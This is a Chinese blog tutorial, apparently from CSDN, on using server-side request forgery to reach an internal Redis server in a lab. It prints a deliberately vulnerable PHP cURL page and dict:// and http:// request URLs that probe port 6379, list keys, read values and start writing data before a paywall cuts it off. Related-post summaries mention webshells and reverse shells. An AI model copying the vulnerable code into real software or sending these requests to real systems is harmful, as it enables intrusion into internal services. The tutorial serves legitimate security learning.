SSRF对Redis进行内网渗透

最新推荐文章于 2026-05-31 13:55:05 发布
原创 最新推荐文章于 2026-05-31 13:55:05 发布 · 1.1k 阅读 · 12
标签
#redis #chrome #数据库

SSRF对Redis进行内网渗透

一 环境搭建

  • 准备一台服务器,开启lampp和redis,redis只允许内网访问

image-20241202110100337

  • 使用kali进行端口扫描,扫不到6379

  • 使用kali连接redis,也连不上

image-20241202110555826

  • ssrf漏洞代码

<?php
​
    $url = $_GET['url'];
​
    // 创建一个cURL资源
    $ch = curl_init();
    // 设置URL和相应的选项
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    // 抓取URL并把它传递给浏览器
    curl_exec($ch);
    // 关闭cURL资源,并且释放系统资源
    curl_close($ch);
?>

二 端口探测

http
    http://192.168.2.26/ssrf2.php?url=http://127.0.0.1:6379
dict
    http://192.168.2.26/ssrf2.php?url=dict://127.0.0.1:6379

image-20241202111719781

三 基于dict协议操作redis

1 查询所有的键

http://192.168.2.26/ssrf2.php?url=dict://127.0.0.1:6379/keys:*

image-20241202114416414

2 查询某个键的值

http://192.168.2.26/ssrf2.php?url=dict://127.0.0.1:6379/get:name

image-20241202114514583

3 向redis中写数据

http://192.168.2.26/ssrf2.php?url=dict://127.0.0.1:6379/set:a
最低0.47元/天 解锁文章
别再只扫端口了!SSRF进阶利用:Gopherus攻击内网Redis、MySQL实战指南
weixin_30516243的博客
05-14 213
本文深入探讨了SSRF漏洞的进阶利用方法,重点介绍了如何通过Gopher协议攻击内网Redis和MySQL服务。文章详细解析了Gopher协议的特性、攻击链构建及防御绕过技术,帮助安全人员掌握从漏洞发现到内网渗透的完整实战技巧,提升SSRF漏洞的深度利用能力。
SSRF+Redis进行内网渗透
zhuge_long的专栏
10-24 1672
gopher协议(信息查找协议),一般用来攻击redis,mysql等服务。其利用的数据格式gopher://ip:端口/_数据,数据的前面需要有_,数据一般需要进行url编码。
利用SSRF攻击Redis
LUOBIKUN的博客
10-20 6028
SSRF漏洞+redis前置知识实验环境搭建SSRF攻击Redis通过redis写入ssh公钥,获取操作系统权限;直接向Web目录中写webshell;linux计划任务执行命令反弹shell。 前置知识 利用SSRF来攻击靶机的redis服务,需要涉及到的一些知识点: 1,Redis客户端和服务端通信过程,以及常用命令; 2,相关协议,例如dict://协议和gother协议的使用 dict://协议 词典网络协议,在RFC 2009中进行描述。它的目标是超越Webster protocol,并允许客户端
SSRFRedis的利用
2301_80127209的博客
01-23 2362
SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(因为请求是由服务端帮我们发起的,所以我们可以通过它来向其所在的内网机器发起请求)。Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦,这款工具里面内置了一些早就写好的利用语句,我们只需要学会如何使用它就可以很方便的写出一些我们需要的利用语句。
SSRFRedis
weixin_44843084的博客
06-06 1002
SSRFRedis https://www.cnblogs.com/linuxsec/articles/11221756.html https://www.cnblogs.com/-chenxs/p/11749367.html 1.探测端口 http://xxx.xxx.xx.xx/xx/xx.php?url=http://目标:6379 如果探测到6379端口,那么可以利用http、gopher、dict这几个协议来打开放6379端口的redis服务, 原理是利用他们以目标机的身份执行对开启redis
ssrf漏洞利用(内网探测、打redis)
Javachichi的博客
02-06 3442
声明该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。滑至文末,获取“searchall”下载链接!
SSRF+Redis内网渗透
zj2084的博客
03-15 838
因为上面的环境我们将密码给注释掉了,所以不会被密码所限制,如果有密码的话,我们只能够登录上去,如果还想继续做Redis的操作,就已经不顶事了,因为这是一个死循环,无论如何只能执行auth:admin123,而不能进行接下来的操作,这样的话,dict这种协议就没有办法啦,dict还可以登录记录那条有效的,我们可以用来爆破登录的密码。由于上面我们将密码给注释了,所以我们现在将密码的注释给删除,然后我们使用bp进行爆破密码,爆破成功,发现密码是admin123。
SSRF+Redis内网渗透
zj2084的博客
03-15 1049
需要满足Gopher的协议要求,其数据格式为:gopher://ip:port/_TCP/IP数据流,比如针对Redis的操作,协议需要gopher://127.0.0.1:6379/_开头,后面跟上基于TCP协议的原始数据包。在这一点上,Dict协议相对方便一些,但是两者有很大差别,比如dict只支持Redis的单条命令,而Gopher可以很好地支持批量命令处理,在针对需要密码登录Redis的情况下,dict也无能为力而Gopher可以很好地完成。替换后的结果如下所示,然后将前面的\r\n给删除即可。
利用 SSRFRedis 未授权访问进行内网渗透
智商不在服务区的博客
03-31 1341
在本次实验中,我们使用 Docker 环境进行测试。解压实验包,搭建docker环境。docker环境web的dockerfile主要利用代码redis服务器通过启动相关容器,初次启动失败。发现docker版本问题,删除docker版本 3,并尝试重新拉取重新启动后,环境成功搭建,获取内网 IP。我们使用抓包工具检测内网存活主机,发现172.18.0.2存在HTTP服务,并返回Go away。使用burpsuite对172.18.0.2进行端口扫描,发现6379端口返回Redis
系统入侵后的提权与权限维持之SSRF+Redis内网渗透
没有网络安全就没有国家安全
03-12 1319
系统入侵后的提权与权限维持之SSRF+Redis内网渗透
SSRFRedis未授权:Kali靶场实战内网渗透全记录
weixin_42539414的博客
04-17 195
本文详细记录了从SSRF漏洞利用到Redis未授权访问的内网渗透实战过程。通过Kali靶场环境搭建、漏洞验证、内网探测及Redis未授权攻击等步骤,展示了完整的渗透测试技术链,特别强调了SSRFRedis未授权访问的组合利用技巧。
基于SSRF+Redis内网渗透
weixin_46686336的博客
11-07 1174
基于SSRF+Redis内网渗透
ssrf漏洞内网渗透_浅析SSRF认证攻击Redis
weixin_39719727的博客
12-22 291
前段时间evoA师傅提到了SSRF可以攻击有密码认证的Redis服务,网上的文章大部分都是未授权打Redis,而有关SSRF认证攻击Redis的文章很少,在这里简单分析一下,如有错误还望斧正。SSRFSSRF漏洞的原理是利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务,我们可以用其探测内网信息、攻击内网应用、穿透防火墙、读取任意文件等。这里我们演示的是攻击内网Redis应用,类似...
Redis未授权到内网沦陷:手把手复现SSRF攻击链与防御加固
weixin_30307921的博客
05-12 439
本文深度剖析了SSRF漏洞如何成为内网渗透的隐形桥梁,通过Redis未授权访问实现攻击链的完整复现,并提供了从网络层到应用层的全方位防御加固方案。文章结合实战案例,详细讲解了SSRF漏洞的利用技巧、内网探测方法以及Gopher协议的高级攻击手段,最后给出包括防火墙规则、Redis配置优化和监控响应在内的多层次防护策略。
SSRFRedis未授权:Kali靶场中的内网渗透实战
u0v1w2x3的博客
03-12 692
本文通过Kali靶场实战,详细演示了如何利用SSRF漏洞作为内网渗透的跳板。从环境搭建、漏洞确认、内网端口扫描,到横向攻击Web服务,并最终利用Redis未授权访问漏洞写入定时任务获取服务器权限,完整复现了从外网到内网的控制链。
从一次内网渗透实战出发:我是如何利用SSRF漏洞接管未授权Redis
最新发布
weixin_30345577的博客
05-31 359
本文详细解析了如何利用SSRF漏洞结合Redis未授权访问实现内网渗透的全过程。从SSRF漏洞发现到Redis信息收集、文件写入攻击,再到SSH公钥注入和定时任务反弹Shell等高级技巧,全面展示了攻击链的构建方法。同时提供了Redis安全配置建议和防御策略,帮助管理员有效防范此类攻击。
CTFHub SSRF通关笔记6:Gopher Redis原理详解与渗透实战
mooyuan的网络安全博客
09-10 1855
本文通过CTFHub的SSRFRedis关卡,详细讲解了利用SSRF结合Gopher协议攻击Redis服务的技术原理与实战方法。首先介绍了SSRF、Gopher协议和Redis在攻击链中的角色,重点解析了如何通过构造恶意Gopher请求突破内网限制实现Redis未授权访问。随后演示了使用Gopherus工具生成攻击载荷的过程,包括路径设置、WebShell内容输入及URL编码等关键步骤。最后通过蚁剑连接生成的木马文件成功获取系统flag,完整展示了从SSRF漏洞发现到实现远程代码执行的全过程。
实战 | 记一次SSRF靶场到内网打穿!
mmquangefafafa的博客
02-22 2317
靶场网络拓扑如下172.172.0.10 这个服务器的 Web 80 端口存在 SSRF 漏洞,并且 80 端口映射到了公网,此时攻击者通过公网可以借助 SSRF 漏洞发起对 172 目标内网的探测和攻击。大部分源码采用自国光师傅的项目,修改了一两个靶机的内容。
从一次内部渗透测试说起:我是如何利用SSRF漏洞,通过Gopher协议拿下Redis
weixin_30681615的博客
05-26 596
本文详细记录了一次利用SSRF漏洞通过Gopher协议攻击Redis服务的渗透测试实战。从漏洞发现、Gopher协议利用到Redis攻击链构建,完整展示了内网渗透的技术细节,并提供了针对SSRFRedis的防御加固建议,为安全从业者提供了宝贵的攻防经验。
ssrf内网探针之redis未授权渗透测试案例
qq_36585338的博客
07-27 417
ssrf内网探针完整渗透测试案例,从确认ssrf漏洞存在到探针内网主机的存活,探针内网主机中第三服务等资产信息的完整渗透测试案例
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值